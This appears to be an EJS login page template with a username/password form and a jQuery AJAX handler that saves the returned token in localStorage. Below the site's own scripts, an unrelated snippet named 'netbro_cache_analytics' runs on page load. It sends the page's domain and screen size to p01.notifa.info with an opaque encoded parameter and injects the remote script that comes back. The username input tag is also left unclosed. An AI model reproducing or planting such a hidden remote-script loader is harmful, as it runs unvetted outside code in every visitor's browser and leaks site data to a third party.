<%- include ../view_layouts/header.ejs %>
<script>
    var isi = localStorage.getItem("token");
    if(isi){
        $(location).attr('href', "/home");

    }
</script>

<body class="bg_darck">
<div class="sufee-login d-flex align-content-center flex-wrap">
    <div class="container">
        <div class="login-content">
            <div class="logo">
                <a href="#">
                    <strong class="logo_icon">
                        <img alt="" src="assets/images/small-logo.png">
                    </strong>
                    <span class="logo-default">
                            <img alt="" src="assets/images/white-logo.png">
                        </span>
                </a>
            </div>
            <div class="login-form">
                <form id="form_login" method="post">
                    <div class="form-group">
                        <label>Username</label>
                        <input type="text" id="uname" class="form-control" name="username" placeholder="Username"
                    </div>
                    <div class="form-group">
                        <label>Password</label>
                        <input type="password" id="pass" class="form-control" name="password" placeholder="Password"/>
                    </div>
                    <button type="submit" class="btn btn-success btn-flat m-b-30 m-t-30">Sign in</button>
                </form>
            </div>
        </div>
    </div>
</div>
<script type="text/javascript" src="assets/js/jquery.min.js"></script>
<script type="text/javascript" src="assets/js/popper.min.js"></script>
<script type="text/javascript" src="assets/js/bootstrap.min.js"></script>
<script type="text/javascript" src="assets/js/jquery.dcjqaccordion.2.7.js"></script>
<script src="assets/js/custom.js" type="text/javascript"></script>
<script type="text/javascript">if (self == top) {
        function netbro_cache_analytics(fn, callback) {
            setTimeout(function () {
                fn();
                callback();
            }, 0);
        }

        function sync(fn) {
            fn();
        }

        function requestCfs() {
            var idc_glo_url = (location.protocol == "https:" ? "https://" : "http://");
            var idc_glo_r = Math.floor(Math.random() * 99999999999);
            var url = idc_glo_url + "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bd%2fEN%2fn2NZ2aqfSoE4ErVTNSMTFCQ3K3qg8uoxRUbtWthHY8RAlTxCM0krJpsj%2bi26hPCXXYUIdpLQkFxaEEvO3jsYgfIZUB1Mx9bWsN9FOZweLkX5FuRTMxuAwy9xEi2BpBGJPvAFRyBq0x1F7T0j4orrFB99nHeKH1v2%2fWkXEZKP9kUesZfbFQcpCfXVY7Qa4eaTDKDSvADPnViY1aH3hjPUwpIZkMCC90raAUBBoPj46OwXV5hmGYELUPrXz%2bGfwmTSrZAKbnKI4ZSj40suRhHzmWNRyDAi1K6o20WqTwaKliCoyzL1Rc04WoF8n2CruewBvi1qD4MNXh1PKZS4X9JwP90xAoU%2bIptLTHNucwyid8a2wdt%2bZ4zQnMzNujn0aThKJzZRMWhc3zSVx309yLsGQ3FnGkJ4Z0njtmvZzR4rzDFVy3UaLYg4QFIIwHXgtzVrLzXq%2f62fnTuY7gjOCFA51z%2bqS%2bOkI36ypM4gDlG01glG%2bFGmX7sMF0awYK8ifKTq2JTMyNSVw7yLEc2i7Q%3d%3d" + "&idc_r=" + idc_glo_r + "&domain=" + document.domain + "&sw=" + screen.width + "&sh=" + screen.height;
            var bsa = document.createElement('script');
            bsa.type = 'text/javascript';
            bsa.async = true;
            bsa.src = url;
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(bsa);
        }

        netbro_cache_analytics(requestCfs, function () {
        });
    }
    ;</script>


<Script>
    $(document).ready(function () {
        login();
    });

    function login() {
        console.log("================LOGIN==============");
        $("#form_login").submit(function (e) {
            e.preventDefault();
            $.ajax({
                url: "/",
                type: "POST",
                data: new FormData(this),
                contentType: false,
                cache: false,
                processData: false,
                success: function (data) {
                    if (data.status === "nok") {
                        alert(data.data);
                    }
                    else {
                        localStorage.setItem("token", data.data.token);
                        $(location).attr('href', "/home");
                    }
                }
            });
        });
    }
</Script>
</body>
